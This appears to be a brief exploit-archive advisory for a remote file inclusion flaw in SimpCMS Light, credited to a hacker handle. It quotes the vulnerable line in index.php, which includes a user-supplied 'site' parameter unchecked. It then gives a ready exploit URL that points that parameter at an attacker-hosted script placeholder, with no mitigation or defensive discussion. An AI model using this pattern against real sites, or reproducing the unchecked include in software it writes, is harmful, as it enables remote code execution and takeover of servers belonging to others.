id: 1735
date: 04/09/2007
title: SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability
author: Dr.RoVeR
cves: 

================================================================
SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability
================================================================



Bug Found By Dr.RoVeR -->Arab48 Hacker
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]



#  0day.today [2023-03-25]  #